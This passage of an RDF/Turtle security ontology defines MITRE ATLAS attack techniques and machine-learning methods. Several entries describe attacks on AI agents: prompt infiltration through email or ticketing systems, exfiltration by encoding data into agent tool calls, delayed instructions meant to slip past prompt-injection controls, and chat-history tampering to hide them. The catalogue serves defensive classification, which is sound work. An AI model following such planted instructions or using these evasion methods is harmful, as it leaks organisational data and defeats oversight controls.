and controlled. This may also expose additional paths for compromise, as an adversary could attempt to trigger the agent from outside its environment and drive it to perform unintended or malicious actions.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0084 ; skos:prefLabel "Activation Triggers" . d3f:AML.T0085.000 a owl:Class ; rdfs:label "RAG Databases - ATLAS" ; d3f:attack-id "AML.T0085.000" ; d3f:definition "Adversaries may prompt the AI service to retrieve data from a RAG database. This can include the majority of an organization's internal documents." ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0085 ; skos:prefLabel "RAG Databases" . d3f:AML.T0085.001 a owl:Class ; rdfs:label "AI Agent Tools - ATLAS" ; d3f:attack-id "AML.T0085.001" ; d3f:definition "Adversaries may prompt the AI service to invoke various tools the agent has access to. Tools may retrieve data from different APIs or services in an organization." ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0085 ; skos:prefLabel "AI Agent Tools" . d3f:AML.T0086 a owl:Class ; rdfs:label "Exfiltration via AI Agent Tool Invocation - ATLAS" ; d3f:attack-id "AML.T0086" ; d3f:definition "Adversaries may use prompts to invoke an agent's tool capable of performing write operations to exfiltrate data. Sensitive information can be encoded into the tool's input parameters and transmitted as part of a seemingly legitimate action. Variants include sending emails, creating or modifying documents, updating CRM records, or even generating media such as images or videos." ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASExfiltrationTechnique ; skos:prefLabel "Exfiltration via AI Agent Tool Invocation" . d3f:AML.T0087 a owl:Class ; rdfs:label "Gather Victim Identity Information - ATLAS" ; d3f:attack-id "AML.T0087" ; d3f:definition """Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, photos, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations. Adversaries may gather this information in various ways, such as direct elicitation, [Search Victim-Owned Websites](/techniques/AML.T0003), or via leaked information on the black market. Adversaries may use the gathered victim data to Create Deepfakes and impersonate them in a convincing manner. This may create opportunities for adversaries to [Establish Accounts](/techniques/AML.T0021) under the impersonated identity, or allow them to perform convincing [Phishing](/techniques/AML.T0052) attacks.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASReconnaissanceTechnique ; skos:prefLabel "Gather Victim Identity Information" . d3f:AML.T0088 a owl:Class ; rdfs:label "Generate Deepfakes - ATLAS" ; d3f:attack-id "AML.T0088" ; d3f:definition """Adversaries may use generative artificial intelligence (GenAI) to create synthetic media (i.e. imagery, video, audio, and text) that appear authentic. These "[deepfakes]( https://en.wikipedia.org/wiki/Deepfake)" may mimic a real person or depict fictional personas. Adversaries may use deepfakes for impersonation to conduct [Phishing](/techniques/AML.T0052) or to evade AI applications such as biometric identity verification systems (see [Evade AI Model](/techniques/AML.T0015)). Manipulation of media has been possible for a long time, however GenAI reduces the skill and level of effort required, allowing adversaries to rapidly scale operations to target more users or systems. It also makes real-time manipulations feasible. Adversaries may utilize open-source models and software that were designed for legitimate use cases to generate deepfakes for malicious use. However, there are some projects specifically tailored towards malicious use cases such as [ProKYC](https://www.catonetworks.com/blog/prokyc-selling-deepfake-tool-for-account-fraud-attacks/).""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASAIAttackStagingTechnique ; skos:prefLabel "Generate Deepfakes" . d3f:AML.T0089 a owl:Class ; rdfs:label "Process Discovery - ATLAS" ; d3f:attack-id "AML.T0089" ; d3f:definition """Adversaries may attempt to get information about processes running on a system. Once obtained, this information could be used to gain an understanding of common AI-related software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Identifying the AI software stack can then lead an adversary to new targets and attack pathways. AI-related software may require application tokens to authenticate with backend services. This provides opportunities for [Credential Access](/tactics/AML.TA0013) and [Lateral Movement](/tactics/AML.TA0015). In Windows environments, adversaries could obtain details on running processes using the Tasklist utility via cmd or `Get-Process` via PowerShell. Information about processes can also be extracted from the output of Native API calls such as `CreateToolhelp32Snapshot`. In Mac and Linux, this is accomplished with the `ps` command. Adversaries may also opt to enumerate processes via `/proc`.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASDiscoveryTechnique ; skos:prefLabel "Process Discovery" . d3f:AML.T0090 a owl:Class ; rdfs:label "OS Credential Dumping - ATLAS" ; d3f:attack-id "AML.T0090" ; d3f:definition """Adversaries may extract credentials from OS caches, application memory, or other sources on a compromised system. Credentials are often in the form of a hash or clear text, and can include usernames and passwords, application tokens, or other authentication keys. Credentials can be used to perform [Lateral Movement](/tactics/AML.TA0015) to access other AI services such as AI agents, LLMs, or AI inference APIs. Credentials could also give an adversary access to other software tools and data sources that are part of the AI DevOps lifecycle.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASCredentialAccessTechnique ; skos:prefLabel "OS Credential Dumping" . d3f:AML.T0091.000 a owl:Class ; rdfs:label "Application Access Token - ATLAS" ; d3f:attack-id "AML.T0091.000" ; d3f:definition """Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials. Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS). They are commonly used for AI services such as chatbots, LLMs, and predictive inference APIs.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0091 ; skos:prefLabel "Application Access Token" . d3f:AML.T0092 a owl:Class ; rdfs:label "Manipulate User LLM Chat History - ATLAS" ; d3f:attack-id "AML.T0092" ; d3f:definition """Adversaries may manipulate a user's large language model (LLM) chat history to cover the tracks of their malicious behavior. They may hide persistent changes they have made to the LLM's behavior, or obscure their attempts at discovering private information about the user. To do so, adversaries may delete or edit existing messages or create new threads as part of their coverup. This is feasible if the adversary has the victim's authentication tokens for the backend LLM service or if they have direct access to the victim's chat interface. Chat interfaces (especially desktop interfaces) often do not show the injected prompt for any ongoing chat, as they update chat history only once when initially opening it. This can help the adversary's manipulations go unnoticed by the victim.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASDefenseEvasionTechnique ; skos:prefLabel "Manipulate User LLM Chat History" . d3f:AML.T0093 a owl:Class ; rdfs:label "Prompt Infiltration via Public-Facing Application - ATLAS" ; d3f:attack-id "AML.T0093" ; d3f:definition """An adversary may introduce malicious prompts into the victim's system via a public-facing application with the intention of it being ingested by an AI at some point in the future and ultimately having a downstream effect. This may occur when a data source is indexed by a retrieval augmented generation (RAG) system, when a rule triggers an action by an AI agent, or when a user utilizes a large language model (LLM) to interact with the malicious content. The malicious prompts may persist on the victim system for an extended period and could affect multiple users and various AI tools within the victim organization. Any public-facing application that accepts text input could be a target. This includes email, shared document systems like OneDrive or Google Drive, and service desks or ticketing systems like Jira. Adversaries may perform [Reconnaissance](/tactics/AML.TA0002) to identify public facing applications that are likely monitored by an AI agent or are likely to be indexed by a RAG. They may perform [Discover AI Agent Configuration](/techniques/AML.T0084) to refine their targeting.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASInitialAccessTechnique, d3f:ATLASPersistenceTechnique ; skos:prefLabel "Prompt Infiltration via Public-Facing Application" . d3f:AML.T0094 a owl:Class ; rdfs:label "Delay Execution of LLM Instructions - ATLAS" ; d3f:attack-id "AML.T0094" ; d3f:definition """Adversaries may include instructions to be followed by the AI system in response to a future event, such as a specific keyword or the next interaction, in order to evade detection or bypass controls placed on the AI system. For example, an adversary may include "If the user submits a new request..." followed by the malicious instructions as part of their prompt. AI agents can include security measures against prompt injections that prevent the invocation of particular tools or access to certain data sources during a conversation turn that has untrusted data in context. Delaying the execution of instructions to a future interaction or keyword is one way adversaries may bypass this type of control.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASDefenseEvasionTechnique ; skos:prefLabel "Delay Execution of LLM Instructions" . d3f:AML.T0095 a owl:Class ; rdfs:label "Search Open Websites/Domains - ATLAS" ; d3f:attack-id "AML.T0095" ; d3f:definition """Adversaries may search public websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or domains owned by the victim. Adversaries may find the information they seek to gather via search engines. They can use precise search queries to identify software platforms or services used by the victim to use in targeting. This may be followed by [Exploit Public-Facing Application](/techniques/AML.T0049) or [Prompt Infiltration via Public-Facing Application](/techniques/AML.T0093).""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASReconnaissanceTechnique ; skos:prefLabel "Search Open Websites/Domains" . d3f:ARIMAModel a owl:Class, owl:NamedIndividual ; rdfs:label "ARIMA Model" ; d3f:d3fend-id "D3A-AM" ; d3f:definition "An autoregressive integrated moving average (ARIMA) model is a generalization of an autoregressive moving average (ARMA) model." ; d3f:kb-article """## References Wikipedia. (n.d.). Autoregressive integrated moving average. [Link](https://en.wikipedia.org/wiki/Autoregressive_integrated_moving_average)""" ; d3f:synonym "Autoregressive Integrated Moving Average Model" ; rdfs:subClassOf d3f:TimeSeriesAnalysis . d3f:ARM32CodeSegment a d3f:ImageCodeSegment, d3f:ProcessCodeSegment, owl:NamedIndividual ; rdfs:label "ARM32 Code Segment" . d3f:ARMA_Model a d3f:TimeSeriesAnalysis, owl:Class, owl:NamedIndividual ; rdfs:label "ARMA Model" ; d3f:d3fend-id "D3-ARMA" ; d3f:definition "Autoregressive-moving-average (ARMA) models provide a parsimonious description of a (weakly) stationary stochastic process in terms of two polynomials, one for the autoregression (AR) and the second for the moving average (MA)." ; d3f:kb-article """## References Wikipedia. (n.d.). Autoregressive-moving-average model. [Link](https://en.wikipedia.org/wiki/Autoregressive%E2%80%93moving-average_model)""" ; d3f:synonym "Autoregressive moving average model" ; rdfs:subClassOf d3f:TimeSeriesAnalysis . d3f:ASCIIDomainName a d3f:DomainName, owl:NamedIndividual ; rdfs:label "ASCII Domain Name" . d3f:ATTACKMergedThing a owl:Class ; rdfs:label "ATTACK Merged Thing" ; rdfs:subClassOf d3f:ATTACKThing . d3f:AccessDeniedEvent a owl:Class ; rdfs:label "Access Denied Event" ; d3f:definition "An event indicating the refusal of access to a resource, where an access request has been evaluated and denied based on current authorization policies, preventing operations by the requesting agent." ; rdfs:subClassOf d3f:AccessMediationEvent . d3f:AccessGrantedEvent a owl:Class ; rdfs:label "Access Granted Event" ; d3f:definition "An event signifying that access to a resource has been authorized and successfully enforced, allowing the requesting agent to perform specified operations based on the access control policies." ; rdfs:subClassOf d3f:AccessMediationEvent . d3f:ActivityDependency a owl:Class ; rdfs:label "Activity Dependency" ; d3f:definition "An activity dependency is a dependency that indicates an activity has an activity or agent which relies on it in order to be functional." ; rdfs:subClassOf d3f:Dependency . d3f:Actor-Critic a owl:Class, owl:NamedIndividual ; rdfs:label "Actor-Critic" ; d3f:d3fend-id "D3A-AC" ; d3f:definition "Actor-Critic is a Temporal Difference(TD) version of Policy gradient. It has two networks: Actor and Critic. The actor decided which action should be taken and critic inform the actor how good was the action and how it should adjust. The learning of the actor is based on policy gradient approach. In comparison, critics evaluate the action produced by the actor by computing the value function." ; d3f:kb-article """## References The Actor-Critic Reinforcement Learning Algorithm. Medium. [Link](https://medium.com/intro-to-artificial-intelligence/the-actor-critic-reinforcement-learning-algorithm-c8095a655c14).""" ; rdfs:subClassOf d3f:PolicyGradient, d3f:TemporalDifferenceLearning . d3f:AdaptiveResonanceTheoryClustering a owl:Class, owl:NamedIndividual ; rdfs:label "Adaptive Resonance Theory Clustering" ; d3f:d3fend-id "D3A-ARTC" ; d3f:definition "Adaptive Resonance Theory (ART) Clustering is a neural network algorithm used for clustering data and is open to new learning(i.e. adaptive) without discarding the previous or the old information(i.e. resonance)." ; d3f:kb-article """## References GeeksforGeeks. (n.d.). Adaptive Resonance Theory (ART). [Link](https://www.geeksforgeeks.org/adaptive-resonance-theory-art/)""" ; rdfs:subClassOf d3f:ANN-basedClustering . d3f:AdobePDFFile1.3 a d3f:DocumentFile, owl:NamedIndividual ; rdfs:label "Adobe PDF File 1.3" ; d3f:may-contain d3f:JavascriptFile . d3f:AgglomerativeClustering a owl:Class, owl:NamedIndividual ; rdfs:label "Agglomerative Clustering" ; d3f:d3fend-id "D3A-AC" ; d3f:definition "Agglomerative Clustering is a type of hierarchical clustering method where data points are grouped together based on similarity. Initially, each data point is treated as an individual cluster, and then in successive iterations, the closest clusters are merged until only one large cluster remains or until a specified stopping criterion is met." ; d3f:kb-article """## How it works Agglomerative clustering starts with each data point as its own cluster. The algorithm then iterates, identifying the two clusters that are closest to each other based on a defined distance metric (e.g., Euclidean, Manhattan). These two clusters are then merged into a single cluster. This process continues iteratively, merging the closest pairs of clusters in each step until all data points are merged into a single cluster or until other stopping criteria are achieved. A dendrogram, which is a tree-like diagram, can be used to represent the sequence of merges, providing a visual representation of the hierarchical structure of data. ## Considerations - **Choice of Distance Metric**: The outcome can vary significantly depending on the chosen distance metric (e.g., Euclidean, Manhattan). - **Scalability**: Agglomerative clustering can be computationally intensive for large datasets. - **Sensitivity**: The method can be sensitive to outliers, which might affect the quality of the clusters formed. ## Key Test Considerations - **Unsupervised Learning**: - **Number of Clusters**: Determine an optimal number of clusters using the dendrogram and techniques like the elbow method. - **Cluster Analysis**: - **Silhouette Score**: Evaluates how similar an object is to its own cluster compared to other clusters. A higher silhouette score indicates that the object is well matched to its own cluster and poorly matched to neighboring clusters. - **Dunn Index**: Measures the ratio between the smallest distance between observations not in the same cluster to the largest intra-cluster distance. - **Hierarchical Clustering**: - **Cophenetic Correlation Coefficient**: Measures the correlation between the distances of points in feature space and their distances on the dendrogram. Helps assess the fidelity of the dendrogram in preserving pairwise distances between samples. - **Agglomerative Clustering**: - **Linkage Criteria**: Test different linkage criteria (e.g., single, complete, average) to determine which produces the most cohesive clusters for the data at hand. ## Platforms, Tools, or Libraries - **scikit-learn**: - A versatile machine learning library in Python. - The `AgglomerativeClustering` class in scikit-learn provides this functionality. - **SciPy**: - A Python library used for scientific and technical computing. - The `scipy.cluster.hierarchy` module provides functions for hierarchical and agglomerative clustering, including the `linkage` and `dendrogram` functions. - **R**: - The `hclust` function in the stats package provides agglomerative clustering. - The `agnes` function in the `cluster` package offers a more extensive implementation. - **MATLAB**: - Offers the `linkage` function for hierarchical agglomerative clustering and `dendrogram` for visualization. - **Weka**: - A collection of machine learning algorithms for data mining tasks. - The `HierarchicalClusterer` class provides an implementation of agglomerative clustering. ## References 1. Jain, A. K., & Dubes, R. C. (1988). *Algorithms for clustering data*. Prentice-Hall, Inc. 2. Murtagh, F., & Legendre, P. (2014). Ward’s hierarchical agglomerative clustering method: which algorithms implement Ward’s criterion?. *Journal of Classification*, 31(3), 274-295. [Link](https://link.springer.com/article/10.1007/s00357-014-9161-z). 3. Scikit-learn. (30 Jun 2023). Scikit-learn Documentation: Agglomerative Clustering. [Link](https://scikit-learn.org/stable/modules/generated/sklearn.cluster.AgglomerativeClustering.html).""" ; rdfs:subClassOf d3f:HierarchicalClustering . d3f:AlethicLogic a owl:Class, owl:NamedIndividual ; rdfs:label "Alethic Logic" ; d3f:d3fend-id "D3A-AL" ; d3f:definition "Alethic logic is a modal logic that addresses the modalities of necessity and possibility." ; d3f:kb-article """## References 1. Alethic logic. (2023, June 4). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Modal_logic#Alethic_logic)""" ; rdfs:subClassOf d3f:ModalLogic . d3f:Alias a owl:Class ; rdfs:label "Alias" ; d3f:definition "In macOS, an alias is a small file that represents another object in a local, remote, or removable[1] file system and provides a dynamic link to it; the target object may be moved or renamed, and the alias will still link to it (unless the original file is recreated; such an alias is ambiguous and how it is resolved depends on the version of macOS)." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:SlowSymbolicLink . d3f:AnonymousPipe a owl:Class ; rdfs:label "Anonymous Pipe" ; d3f:definition "In computer science, an anonymous pipe is a simplex FIFO communication channel that may be used for one-way interprocess communication (IPC). An implementation is often integrated into the operating system's file IO subsystem. Typically a parent program opens anonymous pipes, and creates a new process that inherits the other ends of the pipes, or creates several new processes and arranges them in a pipeline." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:Pipe . d3f:AnswerSetProgramming a owl:Class, owl:NamedIndividual ; rdfs:label "Answer Set Programming" ; d3f:d3fend-id "D3A-ASP" ; d3f:definition "Answer set programming is a form of declarative programming based on the stable model (answer set) semantics of logic programming." ; d3f:kb-article """## How it works Answer set programming (ASP) is oriented towards difficult (primarily NP-hard) search problems. The computational process employed in the design of many answer set solvers is an enhancement of the DPLL algorithm and, in principle, it always terminates (unlike Prolog query evaluation, which may lead to an infinite loop). In a more general sense, ASP includes all applications of answer sets to knowledge representation and the use of Prolog-style query evaluation for solving problems arising in these applications. ## References 1. Answer set programming. (2023, April 27). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Answer_set_programming)""" ; d3f:synonym "ASP" ; rdfs:subClassOf d3f:LogicProgramming . d3f:ApplicationConfigurationModificationEvent a owl:Class ; rdfs:label "Application Configuration Modification Event" ; d3f:definition "An event in which the configuration of a specific software application is changed, affecting how that application executes, interacts with other components, or exposes functionality to users or services." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:precedes ; owl:someValuesFrom d3f:ApplicationUpdateEvent ], [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:ApplicationConfiguration ], d3f:ConfigurationModificationEvent . d3f:ApplicationInventorySensor a owl:Class, owl:NamedIndividual ; rdfs:label "Application Inventory Sensor" ; d3f:definition "Collects information on applications on an endpoint." ; d3f:monitors d3f:Application ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:monitors ; owl:someValuesFrom d3f:Application ], d3f:EndpointSensor . d3f:ApplicationLayerLink a owl:Class ; rdfs:label "Application Layer Link" ; d3f:definition "An Application Layer Link is a type of logical link that exists at the application layer of a network or system architecture." ; rdfs:subClassOf d3f:LogicalLink . d3f:ApplicationProcessConfiguration a owl:Class ; rdfs:label "Application Process Configuration" ; d3f:definition "The current configuration of an application process, stored in memory. It may have been sourced from other types of application configurations, e.g. Application Configuration Files or Application Configuration Database Records." ; rdfs:subClassOf d3f:ApplicationConfiguration . d3f:ApplicationShim a owl:Class ; rdfs:label "Application Shim" ; d3f:definition "An application shim adapts an application program to run on a version of a platform for which they were not originally created. Most commonly \"Application Shimming\" refers to use of The Windows Application Compatibility Toolkit (ACT) provides backward compatibility by simulating the behavior of older version of Windows." ; rdfs:seeAlso d3f:Shim, ; rdfs:subClassOf d3f:Shim . d3f:AssociationRuleLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Association Rule Learning" ; d3f:d3fend-id "D3A-ARL" ; d3f:definition "Association rule learning is a rule-based machine learning method for discovering interesting relations between variables in large databases." ; d3f:kb-article """## References Association rule learning. (n.d.). Wikipedia. [Link](https://en.wikipedia.org/wiki/Association_rule_learning)""" ; rdfs:subClassOf d3f:UnsupervisedLearning . d3f:AsymmetricFeature-basedTransferLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Asymmetric Feature-based Transfer Learning" ; d3f:d3fend-id "D3A-AFTL" ; d3f:definition "Homogeneous (where the metrics are the same for both source and target) asymmetric transformation mapping transforms the source feature space to align with that of the target or the target to that of the source. This, in effect, bridges the feature space gap and reduces the problem into a homogeneous transfer problem when further distribution differences need to be corrected." ; d3f:kb-article """## References Day, O., & Khoshgoftaar, T.M. (2017). A survey on heterogeneous transfer learning. Journal of Big Data, 4(1), 29. [Link](https://doi.org/10.1186/s40537-017-0089-0).""" ; rdfs:subClassOf d3f:HomogenousTransferLearning . d3f:AuthenticateUser a owl:Class, owl:NamedIndividual ; rdfs:label "Authenticate User" ; d3f:authenticates d3f:UserAccount ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:authenticates ; owl:someValuesFrom d3f:UserAccount ], d3f:SystemCall . d3f:AuthenticationServer a owl:Class, owl:NamedIndividual ; rdfs:label "Authentication Server" ; d3f:contains d3f:AuthenticationServiceApplication ; d3f:definition "An authentication server provides a network service that applications use to authenticate the credentials, usually account names and passwords, of their users. When a client submits a valid set of credentials, it receives a cryptographic ticket that it can subsequently use to access various services. Major authentication algorithms include passwords, Kerberos, and public key encryption." ; d3f:manages d3f:AuthenticationService ; rdfs:isDefinedBy ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:manages ; owl:someValuesFrom d3f:AuthenticationService ], [ a owl:Restriction ; owl:onProperty d3f:contains ; owl:someValuesFrom d3f:AuthenticationServiceApplication ], d3f:Server . d3f:AuthorizationLog a owl:Class, owl:NamedIndividual ; rdfs:label "Authorization Log" ; d3f:definition "A log of authorization events." ; d3f:records d3f:NetworkResourceAccess ; rdfs:seeAlso , ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:records ; owl:someValuesFrom d3f:NetworkResourceAccess ], d3f:EventLog . d3f:Autoencoding a owl:Class, owl:NamedIndividual ; rdfs:label "Autoencoding" ; d3f:d3fend-id "D3A-AUT" ; d3f:definition "Autoencoders are specific type of deep learning architecture used for learning representation of data, typically for the purpose of dimensionality reduction. This is achieved by designing deep learning architecture that aims that copying input layer at its output layer." ; d3f:kb-article """## References SOCR. (n.d.). ABIDE Autoencoder. [Link](https://socr.umich.edu/HTML5/ABIDE_Autoencoder/#:~:text=In%20simple%20words%2C%20autoencoders%20are,layer%20at%20its%20output%20layer.)""" ; rdfs:subClassOf d3f:DimensionReduction . d3f:AutoregressiveModel a owl:Class, owl:NamedIndividual ; rdfs:label "Autoregressive Model" ; d3f:d3fend-id "D3A-AM" ; d3f:definition "An autoregressive (AR) model is a representation of a type of random process; as such, it is used to describe certain time-varying processes in nature, economics, behavior, etc." ; d3f:kb-article """## References Wikipedia. (n.d.). Autoregressive model. [Link](https://en.wikipedia.org/wiki/Autoregressive_model)""" ; d3f:synonym "AR Model" ; rdfs:subClassOf d3f:TimeSeriesAnalysis . d3f:BERT a owl:Class, owl:NamedIndividual ; rdfs:label "BERT" ; d3f:d3fend-id "D3A-BER" ; d3f:definition "Bidirectional Encoder Representations from Transformers (BERT) is based on a deep learning model in which every output element is connected to every input element, and the weightings between them are dynamically calculated based upon their connection." ; d3f:kb-article """## References BERT (language model). (n.d.). In TechTarget. [Link](https://www.techtarget.com/searchenterpriseai/definition/BERT-language-model) BERT (language model). (n.d.). In Wikipedia. [Link](https://en.wikipedia.org/wiki/BERT_(language_model))""" ; d3f:synonym "Bidirectional Encoder Representations from Transformers" ; rdfs:subClassOf d3f:Transformer-basedLearning . d3f:BSDProcess a d3f:Process, owl:NamedIndividual ; rdfs:label "BSD Process" . d3f:BarcodeScannerInputDevice a owl:Class ; rdfs:label "Barcode Scanner Input Device" ; d3f:definition "A barcode reader (or barcode scanner) is an optical scanner that can read printed barcodes, decode the data contained in the barcode and send the data to a computer. Like a flatbed scanner, it consists of a light source, a lens and a light sensor translating for optical impulses into electrical signals. Additionally, nearly all barcode readers contain decoder circuitry that can analyze the barcode's image data provided by the sensor and sending the barcode's content to the scanner's output port." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:ImageScannerInputDevice ; skos:altLabel "Barcode Reader" . d3f:BashScriptFile a d3f:ExecutableScript, owl:NamedIndividual ; rdfs:label "Bash Script File" . d3f:BayesOptimalClassifier a owl:Class, owl:NamedIndividual ; rdfs:label "Bayes Optimal Classifier" ; d3f:d3fend-id "D3A-BOC" ; d3f:definition "A probabilistic model that makes the most probable prediction for a new example." ; d3f:kb-article """## References Bayes Optimal Classifier. Machine Learning Mastery. [Link](https://machinelearningmastery.com/bayes-optimal-classifier/). Ensemble learning. Wikipedia. [Link](https://en.wikipedia.org/wiki/Ensemble_learning).""" ; rdfs:subClassOf d3f:EnsembleLearning . d3f:BayesianEstimation a owl:Class, owl:NamedIndividual ; rdfs:label "Bayesian Estimation" ; d3f:d3fend-id "D3A-BE" ; d3f:definition "A Bayes estimator or a Bayes action is an estimator or decision rule that minimizes the posterior expected value of a loss function (i.e., the posterior expected loss)." ; d3f:kb-article """## References Wikipedia. (n.d.). Bayes estimator. [Link](https://en.wikipedia.org/wiki/Bayes_estimator)""" ; rdfs:subClassOf d3f:BayesianMethod . d3f:BayesianHypothesisTesting a owl:Class, owl:NamedIndividual ; rdfs:label "Bayesian Hypothesis Testing" ; d3f:d3fend-id "D3A-BHT" ; d3f:definition "Bayesian hypothesis testing can be framed as a special case of model comparison where a model refers to a likelihood function and a prior distribution." ; d3f:kb-article """## How it works Given two competing hypotheses and some relevant data, Bayesian hypothesis testing begins by specifying separate prior distributions to quantitatively describe each hypothesis. The combination of the likelihood function for the observed data with each of the prior distributions yields hypothesis-specific models. For each of the hypothesis-specific models, averaging (ie, integrating) the likelihood with respect to the prior distribution across the entire parameter space yields the probability of the data under the model and, therefore, the corresponding hypothesis. This quantity is more commonly referred to as the marginal likelihood and represents the average fit of the model to the data. The ratio of the marginal likelihoods for both hypothesis-specific models is known as the Bayes factor. ## References Baig, S. A., PhD. (2020). Bayesian Inference: An Introduction to Hypothesis Testing Using Bayes Factors. Nicotine & Tobacco Research, 22(7), 1244-1246. [Link](https://academic.oup.com/ntr/article/22/7/1244/5613971)""" ; rdfs:subClassOf d3f:BayesianMethod . d3f:BayesianLinearRegressionLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Bayesian Linear Regression Learning" ; d3f:d3fend-id "D3A-BLRL" ; d3f:definition "A supervised learning method that builds a Bayesian linear regression model using training data." ; d3f:kb-article """## References Wikipedia. (n.d.). Bayesian linear regression. [Link](https://en.wikipedia.org/wiki/Bayesian_linear_regression)""" ; rdfs:seeAlso d3f:BayesianLinearRegression ; rdfs:subClassOf d3f:RegressionAnalysisLearning . d3f:BayesianModelAveraging a owl:Class, owl:NamedIndividual ; rdfs:label "Bayesian Model Averaging" ; d3f:d3fend-id "D3A-BMA" ; d3f:definition "A parameter estimate (or a prediction of new observations) obtained by averaging the estimates (or predictions) of the different models under consideration, each weighted by its model probability." ; d3f:kb-article """## References Ensemble learning. Wikipedia. [Link](https://en.wikipedia.org/wiki/Ensemble_learning). Bayesian model average: A parameter estimation approach to model agnostic ensemble learning. (2019). Journal of Machine Learning for Modeling and Computing, 1(2), 61-70. [Link](https://journals.sagepub.com/doi/full/10.1177/2515245919898657#:~:text=Bayesian%20model%20average%3A%20A%20parameter,weighted%20by%20its%20model%20probability).""" ; rdfs:subClassOf d3f:EnsembleLearning . d3f:BayesianModelCombination a owl:Class, owl:NamedIndividual ; rdfs:label "Bayesian Model Combination" ; d3f:d3fend-id "D3A-BMC" ; d3f:definition "Bayesian model combination (BMC) is an algorithmic correction to Bayesian model averaging (BMA). Instead of sampling each model in the ensemble individually, it samples from the space of possible ensembles (with model weights drawn randomly from a Dirichlet distribution having uniform parameters)" ; d3f:kb-article """## References Ensemble learning. Wikipedia. [Link](https://en.wikipedia.org/wiki/Ensemble_learning). Shultz, K. M., & Peterson, L. E. (2011). Model-averaged confidence intervals for ensemble learning. In *International Joint Conference on Neural Networks* (pp. 2677-2684). [Link](https://axon.cs.byu.edu/papers/Kristine.ijcnn2011.pdf).""" ; rdfs:subClassOf d3f:EnsembleLearning . d3f:BinaryClassification a owl:Class ; rdfs:label "Binary Classification" ; rdfs:subClassOf d3f:Classifying . d3f:BitmapImageFile a owl:Class, owl:NamedIndividual ; rdfs:label "Bitmap Image File" ; d3f:contains d3f:BitmapImage ; d3f:definition "A file that contains graphics data represented in a bitmap." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:contains ; owl:someValuesFrom d3f:BitmapImage ], d3f:ImageFile . d3f:BooleanExpressionMatching a owl:Class, owl:NamedIndividual ; rdfs:label "Boolean Expression Matching" ; d3f:d3fend-id "D3A-BEM" ; d3f:definition "Boolean expression matching produces a Boolean truth value for a given boolean expression and assignment of values to variables in the expression." ; d3f:kb-article """## How it works A Boolean expression is an expression used in programming languages that produces a Boolean value when evaluated. A Boolean value is either true or false. A Boolean expression may be composed of a combination of the Boolean constants true or false, Boolean-typed variables, Boolean-valued operators, and Boolean-valued functions. Boolean expressions correspond to propositional formulas in logic and are a special case of Boolean circuits. ## References 1. Boolean expression. (2022, April 25). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Boolean_expression) 2. Boolean algebra. (2022, May 19). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Boolean_expression)""" ; rdfs:subClassOf d3f:LogicalRules . d3f:Boosting a owl:Class, owl:NamedIndividual ; rdfs:label "Boosting" ; d3f:d3fend-id "D3A-BOO" ; d3f:definition "Boosting is a sequential process where each subsequent model attempts to correct the errors of the previous model" ; d3f:kb-article """## How it works Boosting consists of using sequentially weak learners where each iteration’s training focuses on previously misclassified instances in order to improve on the previous iteration. This process is continued iteratively until the final prediction is made by aggregating the previous predictions. ## Considerations Boosting can be computationally expensive, prone to overfitting, and slower to train compared to other ensemble methods. There are three main types of Boosting algorithms - Adaptive Boosting Adaptive Boosting (sometimes called AdaBoost) works by adding equal importance to each piece of a dataset and running it through the base learning algorithms. Every algorithm that errors, the boosting algorithm assigns a higher importance to. This continues until an acceptable level of confidence is reached. - Gradient Boosting Gradient Boosting starts by training multiple models simultaneously to gather a strong estimate of strength to build new base learning algorithms. - XGBoosting XGBoosting is a scalable tree boosting model. Using decision trees, weight is assigned to each variable and put into a decision tree. Outputs that are classified by the algorithm as wrong or weak are put into a second decision tree and the results form a stronger model. ## References Sciencedirect. (n.d.). Semi-supervised learning: An overview. [Link](https://www.sciencedirect.com/science/article/pii/S1319157823000228)""" ; rdfs:subClassOf d3f:EnsembleLearning . d3f:BucketOfModels a owl:Class, owl:NamedIndividual ; rdfs:label "Bucket of Models" ; d3f:d3fend-id "D3A-BOM" ; d3f:definition "A \"bucket of models\" is an ensemble technique in which a model selection algorithm is used to choose the best model for each problem. When tested with only one problem, a bucket of models can produce no better results than the best model in the set, but when evaluated across many problems, it will typically produce much better results, on average, than any model in the set." ; d3f:kb-article """## References Ensemble learning. Wikipedia. 